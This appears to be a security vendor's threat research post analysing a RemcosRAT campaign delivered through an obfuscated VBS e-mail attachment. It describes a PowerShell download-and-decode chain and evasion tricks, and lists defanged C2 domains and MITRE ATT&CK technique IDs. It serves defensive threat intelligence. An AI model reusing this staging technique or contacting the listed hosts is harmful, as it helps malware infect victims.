[Pipeline Research] Investigating A Prepared Campaign of RemcosRAT
Pipeline, Inc. observed a recent threat campaign of RemcosRAT malware. The threat actor was distributing malicious VBS file via e-mail attachment. The infection chain is like below-
Photo: Infection Chain We Observed
At first we found a very obfuscated VBS e-mail attachment which was hard to analyze. We first de-obfuscated it and found that the below function is executed by PowerShell-
This snippet of code is executed by Wscript.Shell. It downloads the second payload from C2 server using the PowerShell cmdlet Start-BitsTransfer and writes the payload to a local file named Asturi.Bel. The C2 server URL is-
hxxps[://]spiderzlame[.]shop/Memoreres[.]hhk
Surprisingly when we visited the domain, we got this-
Even, when we try to get the Whois info for the domain, we get 'Server is busy now, please try again later.' like below-
This is why it seems to be a very prepared threat campaign, where the obfuscation is everywhere. Anyway, the payload downloaded from the C2 is a very long Base64 data (more than 200k characters)-
Photo: Base64 Payload Downloaded from C2
The payload is decoded using the [System.Convert]::FromBase64String() method. Then it uses the [System.Text.Encoding]::ASCII.GetString() method to convert the byte array to string. Although de-obfuscating is not completed yet. Some garbage text is still there in the payload. So, the malware now uses the substring() function to extract the actual payload-
This payload contains a function Spnding02() at the beginning. Which is used to de-obfuscate the next stage payload. After de-obfuscating and simplifying the payload, it looks like below-
The malware found to be connected with another domain-
windowsupdatebg[.]s[.]llnwi[.]net
The malware’s name in the e-mail attachment is 'importe PDF.vbs'. The malware sleeps sometime as an evasion technique and uses VirtualAlloc() function for reserving code to execute. Some of its command lines are as below-
MITRE ATT&CK Mapping
T1047
T1010
T1018
T1082
T1083
T1518.001
T1105
T1497
Building a Smart Security Pipeline
Gain a new level of insight and knowledge across your organization to speed up decision making and business actions.